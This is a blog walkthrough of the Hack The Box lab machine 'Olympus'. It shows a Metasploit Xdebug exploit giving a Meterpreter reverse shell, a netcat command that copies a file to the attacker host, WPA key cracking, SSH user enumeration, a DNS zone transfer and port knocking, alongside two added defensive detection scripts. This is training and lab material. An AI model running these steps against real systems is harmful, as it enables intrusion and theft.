5 December 2022

Pentesting Fun Stuff

following the cyber security path…

Olympus

Starting with a port scan.

root@n0w4n:~# nmap -v -n -T4 -sS -sV -sC -oN ~/htb/olympus/scan.nmap -p- 10.10.10.83
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-04 19:06 CET
Nmap scan report for 10.10.10.83
Host is up (0.033s latency).
Not shown: 65531 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   filtered ssh
53/tcp   open     domain  (unknown banner: Bind)
| dns-nsid:
|_  bind.version: Bind
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|     bind
|_    Bind
80/tcp   open     http    Apache httpd
|_http-favicon: Unknown favicon MD5: 399EAE2564C19BD20E855CDB3C0C9D1B
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Crete island - Olympus HTB
2222/tcp open     ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-City of olympia
| ssh-hostkey:
|   2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA)
|   256 79:90:c0:3d:43:6c:8d:72:19:60:45:3c:f8:99:14:bb (ECDSA)
|_  256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519)
NSE: Script Post-scanning.
Initiating NSE at 19:07
Completed NSE at 19:07, 0.00s elapsed
Initiating NSE at 19:07
Completed NSE at 19:07, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.53 seconds
           Raw packets sent: 66614 (2.931MB) | Rcvd: 65711 (2.628MB)

So SSH port 22 is filtered, which generally means the packets are dropped (by a firewall).
There is an open port 2222 with an SSH server behind it.
There is also a webserver running on port 80 and finally a DNS server behind port 53.
With these results there are a few things off.
First port 22, which I already mentioned.
Also, DNS is mostly UDP, and if TCP port 53 is open for DNS it is mostly there for zone transfers (link).
On port 80 an Apache webserver is running, but unfortunately it doesn’t leak a version number.
There are a few DNS recon tools, but Kali has dnsrecon installed by default, which can scan a nameserver and try to find any registered subdomains.
It can take a while, so I’ll run it in the background with a for loop.

root@n0w4n:~/htb/olympus# for DOMAIN in 10.0.0.0/8 172.16.0.0/16 192.168.0.0/24; do dnsrecon -n 10.10.10.83 -r $DOMAIN --db dns_database; done

On the website there is not that much. Just a picture.

root@n0w4n:~/htb/olympus# curl -v 10.10.10.83
*   Trying 10.10.10.83...
* TCP_NODELAY set
* Connected to 10.10.10.83 (10.10.10.83) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.83
> User-Agent: curl/7.62.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Tue, 04 Dec 2018 19:12:46 GMT
< Server: Apache
< Vary: Accept-Encoding
< X-Content-Type-Options: nosniff
< X-Frame-Options: sameorigin
< X-XSS-Protection: 1; mode=block
< Xdebug: 2.5.5
< Content-Length: 314
< Content-Type: text/html; charset=UTF-8
<
	<!DOCTYPE HTML>
		<html>
		<head>
			<title>Crete island - Olympus HTB</title>
			<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
			<link rel="shortcut icon" href="favicon.ico">
			<link rel="stylesheet" type="text/css" href="crete.css">
		</head>
		<body class="crete">
		</body>
* Connection #0 to host 10.10.10.83 left intact
root@n0w4n:~/htb/olympus# wget 10.10.10.83/zeus.jpg
--2018-12-04 20:11:29--  http://10.10.10.83/zeus.jpg
Connecting to 10.10.10.83:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 37144 (36K) [image/jpeg]
Saving to: ‘zeus.jpg’
zeus.jpg                                             100%[====================================================================================================================>]  36.27K  --.-KB/s    in 0.07s
2018-12-04 20:11:30 (540 KB/s) - ‘zeus.jpg’ saved [37144/37144]

When I check it with exiftool and hexdump there is nothing odd about it. Why did I download the image?
In some CTFs comments are placed in the metadata of an image, or the image is used for steganography.
No comments here, so I’ll hang on to it in case there is a hint about steganography or something.
In the curl output there is another thing that stands out: Xdebug: 2.5.5
After some googling it looks like Xdebug is an extension for PHP to assist with debugging and development. It contains a single-step debugger to use with IDEs (link).
Another hit that came up was for the use of a metasploit module.

msf > use exploit/unix/http/xdebug_unauth_exec
msf exploit(unix/http/xdebug_unauth_exec) > options
Module options (exploit/unix/http/xdebug_unauth_exec):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /index.php       yes       Path to target webapp
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       Callback host for accepting connections
   SRVPORT  9000             yes       Port to listen for the debugger
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf exploit(unix/http/xdebug_unauth_exec) > set rhost 10.10.10.83
rhost => 10.10.10.83
msf exploit(unix/http/xdebug_unauth_exec) > set lhost tun0
lhost => tun0
msf exploit(unix/http/xdebug_unauth_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.8:4444
[*] 10.10.10.83:80 - Waiting for client response.
[*] 10.10.10.83:80 - Receiving response
[*] 10.10.10.83:80 - Shell might take upto a minute to respond.Please be patient.
[*] 10.10.10.83:80 - Sending payload of size 2026 bytes
[*] Sending stage (38247 bytes) to 10.10.10.83
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.83:51148) at 2018-12-04 20:25:05 +0100
id
meterpreter >
meterpreter > sysinfo
Computer    : f00ba96171c5
OS          : Linux f00ba96171c5 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)

I’ll jump onto the machine.

cd /
ls -lah
total 72K
drwxr-xr-x   1 root root 4.0K Apr  8  2018 .
drwxr-xr-x   1 root root 4.0K Apr  8  2018 ..
-rwxr-xr-x   1 root root    0 Apr  8  2018 .dockerenv
drwxr-xr-x   1 root root 4.0K Apr  8  2018 bin
drwxr-xr-x   2 root root 4.0K Jul 13  2017 boot
drwxr-xr-x   5 root root  340 Dec  3 05:13 dev
drwxr-xr-x   1 root root 4.0K Apr  8  2018 etc
drwxr-xr-x   1 root root 4.0K Apr  8  2018 home
drwxr-xr-x   1 root root 4.0K Apr  8  2018 lib
drwxr-xr-x   2 root root 4.0K Oct  9  2017 lib64
drwxr-xr-x   2 root root 4.0K Oct  9  2017 media
drwxr-xr-x   2 root root 4.0K Oct  9  2017 mnt
drwxr-xr-x   2 root root 4.0K Oct  9  2017 opt
dr-xr-xr-x 164 root root    0 Dec  3 05:13 proc
drwx------   1 root root 4.0K Apr 15  2018 root
drwxr-xr-x   1 root root 4.0K Dec  1  2017 run
drwxr-xr-x   1 root root 4.0K Apr  8  2018 sbin
drwxr-xr-x   2 root root 4.0K Oct  9  2017 srv
dr-xr-xr-x  13 root root    0 Dec  3 05:13 sys
drwxrwxrwt   1 root root 4.0K Apr  8  2018 tmp
drwxr-xr-x   1 root root 4.0K Oct  9  2017 usr
drwxr-xr-x   1 root root 4.0K Dec  1  2017 var
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
7: eth0@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:14:00:02 brd ff:ff:ff:ff:ff:ff
    inet 172.20.0.2/16 brd 172.20.255.255 scope global eth0
       valid_lft forever preferred_lft forever

It looks like I’m in a docker environment.

ls -lah /home
total 12K
drwxr-xr-x 1 root root 4.0K Apr  8  2018 .
drwxr-xr-x 1 root root 4.0K Apr  8  2018 ..
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 zeus
ls -lah /home/zeus
total 12K
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 .
drwxr-xr-x 1 root root 4.0K Apr  8  2018 ..
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 airgeddon
ls -lah /home/zeus/airgeddon
total 1.1M
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 .
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 ..
-rw-r--r-- 1 zeus zeus  264 Apr  8  2018 .editorconfig
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 .git
-rw-r--r-- 1 zeus zeus  230 Apr  8  2018 .gitattributes
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 .github
-rw-r--r-- 1 zeus zeus   89 Apr  8  2018 .gitignore
-rw-r--r-- 1 zeus zeus  16K Apr  8  2018 CHANGELOG.md
-rw-r--r-- 1 zeus zeus 3.2K Apr  8  2018 CODE_OF_CONDUCT.md
-rw-r--r-- 1 zeus zeus 6.3K Apr  8  2018 CONTRIBUTING.md
-rw-r--r-- 1 zeus zeus 3.3K Apr  8  2018 Dockerfile
-rw-r--r-- 1 zeus zeus  35K Apr  8  2018 LICENSE.md
-rw-r--r-- 1 zeus zeus 4.4K Apr  8  2018 README.md
-rw-r--r-- 1 zeus zeus 291K Apr  8  2018 airgeddon.sh
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 binaries
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 captured
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 imgs
-rw-r--r-- 1 zeus zeus  16K Apr  8  2018 known_pins.db
-rw-r--r-- 1 zeus zeus 670K Apr  8  2018 language_strings.sh
-rw-r--r-- 1 zeus zeus   33 Apr  8  2018 pindb_checksum.txt
cd /home/zeus/airgeddon/captured
ls -lah
total 304K
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 .
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 ..
-rw-r--r-- 1 zeus zeus 291K Apr  8  2018 captured.cap
-rw-r--r-- 1 zeus zeus   57 Apr  8  2018 papyrus.txt
cat papyrus.txt
Captured while flying. I'll banish him to Olympia - Zeus

Let’s get the file over to my local machine.

root@n0w4n:~/htb/olympus# nc -lp 9999 > captured.cap
nc -w3 10.10.14.8 9999 < captured.cap

And it’s sent.

root@n0w4n:~/htb/olympus# file captured.cap
captured.cap: tcpdump capture file (little-endian) - version 2.4 (802.11, capture length 65535)

Opening the file with wireshark.

SSID…..looks like WiFi.
Let’s check the wireless LAN option.


CCMP……looks like it is a WPA key.
A good way to crack a WPA key is with hashcat. Unfortunately I run Kali in a VM and it doesn’t like hashcat very much.
That’s why I use a somewhat older method with aircrack-ng.

root@n0w4n:~/htb/olympus# aircrack-ng -w /usr/share/wordlists/rockyou.txt captured.cap
      [00:22:04] 5306000/9822768 keys tested (4211.03 k/s)
      Time left: 17 minutes, 52 seconds                         54.02%
                        KEY FOUND! [ flightoficarus ]
      Master Key     : FA C9 FB 75 B7 7E DC 86 CC C0 D5 38 88 75 B8 5A
                       88 3B 75 31 D9 C3 23 C8 68 3C DB FA 0F 67 3F 48
      Transient Key  : 20 05 27 E1 73 E0 73 F5 F1 2D AF D1 17 8B F8 27
                       C6 BE 23 E3 70 8A EF AE 6D 0C 89 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      EAPOL HMAC     : AC 1A 73 84 FB BF 75 9C 86 CF 5B 5A F4 8A 4C 38

For this brute-force attempt I use the favorite CTF wordlist……rockyou.txt
Another method is to use John the Ripper, but then you need to convert the cap file into a hccap file and then into a file which John can digest (can be done with hccap2john).
As I now have the WPA key I can decrypt the traffic.
The capture file has over 6000 packets, so there are some things that can be done to filter it.
First there is the statistics option with protocol hierarchy. With this you can see all the used protocols and get an overview of what to target.
Also I can use a display filter to filter out unwanted packets. In this case I use the ‘ip’ filter so I can see all the IP traffic and nothing else.
Unfortunately I can’t find anything useful in this capture file other than the cracked password. The password by itself may be the final objective of this capture file.
So password reuse maybe?

ss -tupan
Netid  State      Recv-Q Send-Q     Local Address:Port       Peer Address:Port
udp    UNCONN     0      0             127.0.0.11:57019                 *:*
tcp    LISTEN     0      128                    *:80                    *:*
tcp    LISTEN     0      128           127.0.0.11:43929                 *:*
tcp    CLOSE-WAIT 0      0             172.20.0.2:51942        10.10.14.8:9000   users:(("ss",pid=27,fd=13),("sh",pid=22,fd=13),("sh",pid=21,fd=13))
tcp    ESTAB      0      432           172.20.0.2:39186        10.10.14.8:5555   users:(("ss",pid=27,fd=14),("sh",pid=22,fd=14),("sh",pid=21,fd=14))

Nothing interesting is listening on this machine. So I go back to my local machine and try SSH on port 2222 with the found username zeus and the password flightoficarus.
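The ss output above also records the Xdebug call-back itself: the web container (172.20.0.2) connected out to 10.10.14.8:9000, the debugger port the metasploit module listened on. As an added defender-side example (not part of this writeup), here is a small triage parser over `ss -tupan` output that flags such connections; the sample input is the ss output shown above, and treating 9000 as Xdebug’s default remote port is an assumption about Xdebug 2.x defaults.

```python
"""Triage helper: flag debugger call-back connections in `ss -tupan` output.

Added example, not from the writeup. Xdebug 2.x connects *out* from the web
server to the IDE/debugger on xdebug.remote_port (default 9000, assumed here),
so a PHP host talking to a remote machine on that port is worth a look.
"""
import re
from ipaddress import ip_address

DBGP_PORTS = {9000}  # Xdebug 2.x default remote_port (assumption noted above)

# users:(("ss",pid=27,fd=13),("sh",pid=22,fd=13))  ->  [("ss", "27"), ("sh", "22")]
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+),fd=\d+\)')

# The ss output captured in the writeup above, reused here as sample input.
SAMPLE_SS = """\
Netid  State      Recv-Q Send-Q     Local Address:Port       Peer Address:Port
udp    UNCONN     0      0             127.0.0.11:57019                 *:*
tcp    LISTEN     0      128                    *:80                    *:*
tcp    LISTEN     0      128           127.0.0.11:43929                 *:*
tcp    CLOSE-WAIT 0      0             172.20.0.2:51942        10.10.14.8:9000   users:(("ss",pid=27,fd=13),("sh",pid=22,fd=13),("sh",pid=21,fd=13))
tcp    ESTAB      0      432           172.20.0.2:39186        10.10.14.8:5555   users:(("ss",pid=27,fd=14),("sh",pid=22,fd=14),("sh",pid=21,fd=14))
"""


def split_endpoint(endpoint):
    """'172.20.0.2:51942' -> ('172.20.0.2', 51942); '*:*' -> ('*', None)."""
    host, _, port = endpoint.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_ss(output):
    """Turn `ss -tupan` text into dicts; the trailing process list is optional."""
    rows = []
    for line in output.splitlines():
        if not line.strip() or line.startswith("Netid"):
            continue
        parts = line.split(None, 6)  # netid state recv-q send-q local peer [users]
        if len(parts) < 6:
            continue
        netid, state, _recvq, _sendq, local, peer = parts[:6]
        procs = PROC_RE.findall(parts[6]) if len(parts) > 6 else []
        rows.append({
            "netid": netid, "state": state,
            "local": split_endpoint(local), "peer": split_endpoint(peer),
            "procs": [(name, int(pid)) for name, pid in procs],
        })
    return rows


def find_debugger_callbacks(output, ports=DBGP_PORTS):
    """Return TCP rows whose *peer* is a non-loopback host on a debugger port.

    LISTEN rows are skipped: we want connections the server made outward,
    in any state (ESTAB, CLOSE-WAIT, SYN-SENT ...), not sockets it offers.
    """
    hits = []
    for row in parse_ss(output):
        peer_host, peer_port = row["peer"]
        if row["netid"] != "tcp" or row["state"] == "LISTEN" or peer_port not in ports:
            continue
        try:
            if ip_address(peer_host).is_loopback:
                continue  # a local IDE debugging local PHP is the intended use
        except ValueError:
            pass  # '*' or a hostname: treat as remote
        hits.append(row)
    return hits


if __name__ == "__main__":
    for hit in find_debugger_callbacks(SAMPLE_SS):
        host, port = hit["peer"]
        pids = ",".join(f"{n}/{p}" for n, p in hit["procs"])
        print(f"[!] {hit['state']:<10} -> {host}:{port}  procs={pids}")
```

On the sample this flags exactly the CLOSE-WAIT row to 10.10.14.8:9000 and leaves the 5555 session alone; in a real triage you would run it against `ss -tupan` taken on the suspected web host.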

root@n0w4n:~/htb/olympus# ssh zeus@10.10.10.83 -p 2222
zeus@10.10.10.83's password:
Permission denied, please try again.

Not working. Maybe not the right username or password. Metasploit has an SSH user enumeration module.
For this to work I need a list of usernames, and this machine has a clear theme.
I found a site with a nice list of the gods, but it’s not a straight list to download. Normally you can use a tool called CeWL to generate wordlists from websites, but because there is so much text on this site it’s better to do it manually.
So I copied the content of that website, with its many names, into a file. Then I trim the file a bit to be of better use to metasploit.

root@n0w4n:~/htb/olympus# cat gods.list | awk '{print $1}' | tr '[:upper:]' '[:lower:]' > list.gods

As a check I also put root in as a user, because in most cases root is a valid username.

msf auxiliary(scanner/ssh/ssh_enumusers) > options
Module options (auxiliary/scanner/ssh/ssh_enumusers):
   Name         Current Setting          Required  Description
   ----         ---------------          --------  -----------
   CHECK_FALSE  false                    no        Check for false positives (random username)
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       10.10.10.83              yes       The target address range or CIDR identifier
   RPORT        2222                     yes       The target port
   THREADS      1                        yes       The number of concurrent threads
   THRESHOLD    10                       yes       Amount of seconds needed before a user is considered found (timing attack only)
   USERNAME                              no        Single username to test (username spray)
   USER_FILE    ~/htb/olympus/list.gods  no        File containing usernames, one per line
Auxiliary action:
   Name              Description
   ----              -----------
   Malformed Packet  Use a malformed packet
msf auxiliary(scanner/ssh/ssh_enumusers) > run
[*] 10.10.10.83:2222 - SSH - Using malformed packet technique
[*] 10.10.10.83:2222 - SSH - Starting scan
[+] 10.10.10.83:2222 - SSH - User 'root' found
[-] 10.10.10.83:2222 - SSH - User 'acestes' not found
..... [SNIPPED] .....
[-] 10.10.10.83:2222 - SSH - User 'iasion' not found
[+] 10.10.10.83:2222 - SSH - User 'icarus' found
[-] 10.10.10.83:2222 - SSH - User 'idomeneus' not found
..... [SNIPPED] .....
[-] 10.10.10.83:2222 - SSH - User 'zeus' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So there is a username other than root: icarus.
That makes sense as the SSID was Too_cl0se_to_th3_Sun.

root@n0w4n:~/htb/olympus# ssh icarus@10.10.10.83 -p 2222
icarus@10.10.10.83's password:
Permission denied, please try again.

“flightoficarus” is not working? After some pondering I tried the SSID (because it was leet) and that worked as a password.

root@n0w4n:~/htb/olympus# ssh icarus@10.10.10.83 -p 2222
icarus@10.10.10.83's password:
Last login: Sun Apr 15 16:44:40 2018 from 10.10.14.4
icarus@620b296204a3:~$
icarus@620b296204a3:~$ ls -lah
total 32K
drwxr-xr-x 1 icarus icarus 4.0K Apr 15  2018 .
drwxr-xr-x 1 root   root   4.0K Apr  8  2018 ..
-rw------- 1 icarus icarus   33 Apr 15  2018 .bash_history
-rw-r--r-- 1 icarus icarus  220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 icarus icarus 3.7K Aug 31  2015 .bashrc
drwx------ 2 icarus icarus 4.0K Apr 15  2018 .cache
-rw-r--r-- 1 icarus icarus  655 May 16  2017 .profile
-rw-r--r-- 1 root   root     85 Apr 15  2018 help_of_the_gods.txt
icarus@620b296204a3:~$ cat help_of_the_gods.txt
Athena goddess will guide you through the dark...
Way to Rhodes...
ctfolympus.htb

Still no user.txt.
I guess I’m still not the user intended to find the first hash.
I got a hostname and a mention of Athena as a goddess. But that username was already in my list, so it’s not a username for this box.

icarus@620b296204a3:~$ ls -lah /
total 72K
drwxr-xr-x   1 root root 4.0K Apr  8  2018 .
drwxr-xr-x   1 root root 4.0K Apr  8  2018 ..
-rwxr-xr-x   1 root root    0 Apr  8  2018 .dockerenv
drwxr-xr-x   2 root root 4.0K Feb 28  2018 bin
drwxr-xr-x   2 root root 4.0K Apr 12  2016 boot
drwxr-xr-x   5 root root  340 Dec  4 19:51 dev
drwxr-xr-x   1 root root 4.0K Apr  8  2018 etc
drwxr-xr-x   1 root root 4.0K Apr  8  2018 home
drwxr-xr-x   1 root root 4.0K Sep 13  2015 lib
drwxr-xr-x   2 root root 4.0K Feb 28  2018 lib64
drwxr-xr-x   2 root root 4.0K Feb 28  2018 media
drwxr-xr-x   2 root root 4.0K Feb 28  2018 mnt
drwxr-xr-x   2 root root 4.0K Feb 28  2018 opt
dr-xr-xr-x 160 root root    0 Dec  4 19:51 proc
drwx------   1 root root 4.0K Apr 15  2018 root
drwxr-xr-x   1 root root 4.0K Dec  5 08:08 run
drwxr-xr-x   1 root root 4.0K Mar  6  2018 sbin
drwxr-xr-x   2 root root 4.0K Feb 28  2018 srv
dr-xr-xr-x  13 root root    0 Dec  4 19:51 sys
drwxrwxrwt   1 root root 4.0K Apr  3  2018 tmp
drwxr-xr-x   1 root root 4.0K Feb 28  2018 usr
drwxr-xr-x   1 root root 4.0K Feb 28  2018 var

I’m in another docker container.
When I try to enumerate this machine I notice there are almost no tools installed.
From the initial nmap scan I know that there is a nameserver running, but back then I had no domain name.
Let’s try a zone transfer with dig.

root@n0w4n:~/htb/olympus# dig @10.10.10.83 ctfolympus.htb -t AXFR
; <<>> DiG 9.11.5-1-Debian <<>> @10.10.10.83 ctfolympus.htb -t AXFR
; (1 server found)
;; global options: +cmd
ctfolympus.htb.		86400	IN	SOA	ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
ctfolympus.htb.		86400	IN	TXT	"prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
ctfolympus.htb.		86400	IN	A	192.168.0.120
ctfolympus.htb.		86400	IN	NS	ns1.ctfolympus.htb.
ctfolympus.htb.		86400	IN	NS	ns2.ctfolympus.htb.
ctfolympus.htb.		86400	IN	MX	10 mail.ctfolympus.htb.
crete.ctfolympus.htb.	86400	IN	CNAME	ctfolympus.htb.
hades.ctfolympus.htb.	86400	IN	CNAME	ctfolympus.htb.
mail.ctfolympus.htb.	86400	IN	A	192.168.0.120
ns1.ctfolympus.htb.	86400	IN	A	192.168.0.120
ns2.ctfolympus.htb.	86400	IN	A	192.168.0.120
rhodes.ctfolympus.htb.	86400	IN	CNAME	ctfolympus.htb.
RhodesColossus.ctfolympus.htb. 86400 IN	TXT	"Here lies the great Colossus of Rhodes"
www.ctfolympus.htb.	86400	IN	CNAME	ctfolympus.htb.
ctfolympus.htb.		86400	IN	SOA	ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
;; Query time: 30 msec
;; SERVER: 10.10.10.83#53(10.10.10.83)
;; WHEN: Wed Dec 05 09:24:01 CET 2018
;; XFR size: 15 records (messages 1, bytes 475)

Some comments:
“prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!”
RhodesColossus.ctfolympus.htb. 86400 IN TXT “Here lies the great Colossus of Rhodes”
The first one again has a leet string, which looks like a password, and three numbers.
The three numbers and the reference to “temporal” have port knocking written all over it.
There are several ways to knock on a port. You can use nmap, telnet, netcat or, as I’m doing…..knock (you need knockd installed for this).
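What happens on the other side of that knock, as an added example that is not part of the writeup and not knockd’s own code: a knock daemon keeps a small per-source state machine over the firewall’s view of incoming SYNs and only acts when the three ports arrive in order and fast enough. The iptables LOG lines below are constructed, and the 5-second window is an assumed value (knockd calls the setting seq_timeout).

```python
"""Server-side view of port knocking: find sources that hit 3456, 8234, 62431 in order.

Added example, not from the writeup or from knockd. It replays iptables LOG lines
(constructed sample) through the kind of per-source state machine a knock daemon keeps.
"""
import re
from datetime import datetime

KNOCK_SEQUENCE = (3456, 8234, 62431)  # the three numbers from the TXT record
SEQ_TIMEOUT = 5.0  # seconds allowed from first to last knock (assumed; knockd calls it seq_timeout)

# Syslog timestamp, then the iptables LOG fields we need: SRC=, PROTO=TCP, DPT=
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) .*?SRC=(?P<src>\S+) .*?PROTO=TCP .*?DPT=(?P<dpt>\d+)"
)

# Constructed log lines: one clean knock, one out-of-order knock, one too-slow knock.
SAMPLE_LOG = """\
Dec  5 09:42:58 olympus kernel: KNOCK IN=enp0s3 OUT= SRC=10.10.14.8 DST=10.10.10.83 PROTO=TCP SPT=40000 DPT=3456 SYN
Dec  5 09:42:58 olympus kernel: KNOCK IN=enp0s3 OUT= SRC=10.10.14.8 DST=10.10.10.83 PROTO=TCP SPT=40001 DPT=8234 SYN
Dec  5 09:42:59 olympus kernel: KNOCK IN=enp0s3 OUT= SRC=10.10.14.8 DST=10.10.10.83 PROTO=TCP SPT=40002 DPT=62431 SYN
Dec  5 09:43:10 olympus kernel: KNOCK IN=enp0s3 OUT= SRC=10.10.14.21 DST=10.10.10.83 PROTO=TCP SPT=50000 DPT=3456 SYN
Dec  5 09:43:10 olympus kernel: KNOCK IN=enp0s3 OUT= SRC=10.10.14.21 DST=10.10.10.83 PROTO=TCP SPT=50001 DPT=62431 SYN
Dec  5 09:43:11 olympus kernel: KNOCK IN=enp0s3 OUT= SRC=10.10.14.21 DST=10.10.10.83 PROTO=TCP SPT=50002 DPT=8234 SYN
Dec  5 09:43:30 olympus kernel: KNOCK IN=enp0s3 OUT= SRC=10.10.14.30 DST=10.10.10.83 PROTO=TCP SPT=60000 DPT=3456 SYN
Dec  5 09:43:31 olympus kernel: KNOCK IN=enp0s3 OUT= SRC=10.10.14.30 DST=10.10.10.83 PROTO=TCP SPT=60001 DPT=8234 SYN
Dec  5 09:43:40 olympus kernel: KNOCK IN=enp0s3 OUT= SRC=10.10.14.30 DST=10.10.10.83 PROTO=TCP SPT=60002 DPT=62431 SYN
Dec  5 09:43:41 olympus kernel: KNOCK IN=enp0s3 OUT= SRC=10.10.14.30 DST=10.10.10.83 PROTO=TCP SPT=60003 DPT=22 SYN
"""


def parse_line(line, year=2018):
    """Return (timestamp, src_ip, dst_port) or None for lines that are not TCP LOG entries."""
    m = LOG_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["src"], int(m["dpt"])


def find_knocks(lines, sequence=KNOCK_SEQUENCE, timeout=SEQ_TIMEOUT):
    """Return [(src, completion_time)] for each source that knocked the whole sequence in order."""
    progress = {}  # src -> (index of next expected port, time of first knock)
    completed = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, src, dpt = parsed
        if dpt not in sequence:
            continue  # knockd only watches the sequence ports; anything else is invisible to it
        idx, started = progress.get(src, (0, None))
        if idx > 0 and (ts - started).total_seconds() > timeout:
            idx = 0  # too slow: the attempt expires and this knock may start a fresh one
        if dpt == sequence[idx]:
            if idx == 0:
                started = ts
            idx += 1
        elif dpt == sequence[0]:
            idx, started = 1, ts  # wrong port for this step, but it can begin a new attempt
        else:
            idx = 0  # out-of-order knock invalidates the attempt
        if idx == len(sequence):
            completed.append((src, ts))
            progress.pop(src, None)
        else:
            progress[src] = (idx, started)
    return completed


if __name__ == "__main__":
    for src, when in find_knocks(SAMPLE_LOG.splitlines()):
        print(f"[+] {src} completed the knock at {when:%H:%M:%S}: open 22/tcp for this source")
```

Only 10.10.14.8 completes the sequence; the out-of-order and the too-slow attempts are rejected, and the stray SYN to port 22 is ignored because it is not a knock port. Note that this particular sequence is strictly ascending, so a scanner probing ports in increasing order within the timeout would complete it too, which is why a short seq_timeout and a non-monotonic sequence matter on the defending side.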

root@n0w4n:~/htb/olympus# knock 10.10.10.83 3456 8234 62431
root@n0w4n:~/htb/olympus# nmap -n -T4 -p- 10.10.10.83
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-05 09:43 CET
Nmap scan report for 10.10.10.83
Host is up (0.033s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
2222/tcp open  EtherNetIP-1
Nmap done: 1 IP address (1 host up) scanned in 40.38 seconds

Another port scan reveals port 22 to be open.

root@n0w4n:~/htb/olympus# ssh prometheus@10.10.10.83
The authenticity of host '10.10.10.83 (10.10.10.83)' can't be established.
ECDSA key fingerprint is SHA256:8TR2+AWSBT/c5mrjpDotoEYu0mEy/jCzpuS79d+Z0oY.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.83' (ECDSA) to the list of known hosts.
prometheus@10.10.10.83's password:
Welcome to
    )         (
 ( /(     )   )\ )   (
 )\()) ( /(  (()/(  ))\ (
((_)\  )(_))  ((_))/((_))\
| |(_)((_)_   _| |(_)) ((_)
| ' \ / _` |/ _` |/ -_)(_-<
|_||_|\__,_|\__,_|\___|/__/
prometheus@olympus:~$
prometheus@olympus:~$ ls -lah ~
total 28K
drwxr-xr-x 2 prometheus prometheus 4.0K Apr  8  2018 .
drwxr-xr-x 3 root       root       4.0K Apr  4  2018 ..
-rw------- 1 root       root          0 Apr  8  2018 .bash_history
-rw-r--r-- 1 prometheus prometheus  220 Apr  2  2018 .bash_logout
-rw-r--r-- 1 prometheus prometheus 3.6K Apr  4  2018 .bashrc
-rw-r----- 1 root       prometheus  248 Apr  8  2018 msg_of_gods.txt
-rw-r--r-- 1 prometheus prometheus  675 Apr  2  2018 .profile
-rw-r----- 1 root       prometheus   33 Apr  4  2018 user.txt
prometheus@olympus:~$ cat ~/user.txt
[no spoilers]

Finally………the first flag.
Now on to getting root.

prometheus@olympus:~$ ip a | grep inet
    inet 127.0.0.1/8 scope host lo
    inet 10.10.10.83/24 brd 10.10.10.255 scope global enp0s3
    inet 172.19.0.1/16 brd 172.19.255.255 scope global br-0a8ad598ebee
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-2668d8e07649
